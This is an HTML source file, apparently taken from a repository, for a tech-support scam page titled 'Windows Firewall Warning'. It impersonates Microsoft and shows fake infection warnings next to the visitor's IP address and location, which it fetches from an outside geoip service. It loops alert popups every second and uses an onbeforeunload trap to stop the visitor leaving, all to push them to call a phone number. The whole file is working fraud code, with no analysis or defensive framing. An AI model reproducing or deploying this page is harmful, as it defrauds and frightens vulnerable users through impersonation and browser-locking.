Files
2015-04-17 15:08:00 -05:00

131 lines
5.2 KiB
HTML
Executable File

<!DOCTYPE html>
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta charset="UTF-8">
<title>Windows Firewall Warning</title>
<link rel="stylesheet" href="css/normalize.css">
<link rel="stylesheet" href="css/style.css">
<script src="https://code.jquery.com/jquery-1.11.2.min.js" type="text/javascript"></script>
<script>
var number = '(844) 238-8251';
$(document).ready(function () {
$('span#sales-number').html(number);
$('.number').html(number);
$.getJSON("http://www.telize.com/geoip?callback=?",
function(json) {
$('#country').text(json.country);
$('#ip').text(json.ip);
});
});
</script>
<script>
function myFunction()
{
setInterval(function(){alert("WARNING! Your PC may not be protected!\n\nIf you see this message more than once, you need to call PC support at "+number+" immediately\n\nDuring this toll-free call, you will receive assistance on how to remove malicious malware and adware from your PC.")},1000); alert("WARNING! Your PC may not be protected!\n\nIf you see this message more than once, you need to call PC support at "+number+" immediately\n\nDuring this toll-free call, you will receive assistance on how to remove malicious malware and adware from your PC.");
}
</script>
</head>
<body onload="myFunction()">
<div class="container top">
<h3><img src="images/mslogo.png" alt="">(<span class="warning">1</span>) System Warning: </h3>
<p class="virus"><span><img src="images/design.png" alt=""></span>Your Computer May Not Be Protected!</p>
<div class="row">
<div class="column">
<p><i class="column-header">Your Location:</i><br>
<span id="country"></span>
</p>
</div>
<div class="column">
<p><i class="column-header">Your IP Address:</i>
<span id="ip"></span>
</p>
</div>
<div class="column">
<p><i class="column-header">Date:</i><br>
<i id="date">Friday, January 11, 2015</i>
</p>
</div>
</div><!-- end of row -->
</div><!-- end of container -->
<div class="container bottom">
<div class="main">
<h3>What to do:</h3>
<p class="call">Call <span class="contact"><span class="number">844-238-8251</span></span> immediately toll-free</p>
<p class="descript">for assistance on how to remove malicious pop-ups and malware. This call is prioritized and 100% free</p>
<h3>More about the threat:</h3>
<p class="descript">Seeing these pop-up means that you may have malware/adware on your computer which puts the security of your personal data at a serious risk. We strongly advise you call <span class="contact number">855-370-9537</span> toll-free immediately and get your computer fixed before you continue using the internet, especially for watching movies and shows.</p>
<div class="img">
<img src="images/247.png" alt="">
</div>
</div><!-- end of main -->
<div class="sidebar">
<p>Possible network damages from potential threats: <b>UNKNOWN</b></p>
<ol>
<h3>Data exposed to risk:</h3>
<li>Your credit card details and banking information</li>
<li>Your e-mail passwords and other account passwords</li>
<li>Your Facebook, Skype, AIM, ICQ and other chat logs</li>
<li>Your private photos, family photos and other sensitive files</li>
<li>Your webcam could be access remotely by stalkers with a VPN file</li>
</ol>
<a href="##" class="call-btn">Call <span class="number">844-238-8251</span> Now!</a>
</div><!-- end of sidebar -->
</div>
<script>
var d = new Date();
var days = ["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"];
var months = ["January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December"];
document.getElementById("date").innerHTML = days[d.getDay()] + "," + " " + months[d.getMonth()] + " " + d.getDate() + "," + " " + d.getFullYear();
</script>
<script language="javascript">
(function() {
setTimeout(function() {
var __redirect_to = window.location.href; //
window.onbeforeunload = function() {
//This timeout handles redir
setTimeout(function() {
window.onbeforeunload = function() {};
setTimeout(function() {
document.location.href = __redirect_to;
}, 500);
}, 5);
//Dialogue
return 'If you do nothing your computer may continue to be infected\n\nCall '+number+' now to remove threats';
}
}, 500);
})();
</script>
</body>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-61342480-1', 'auto');
ga('send', 'pageview');
</script>
</html>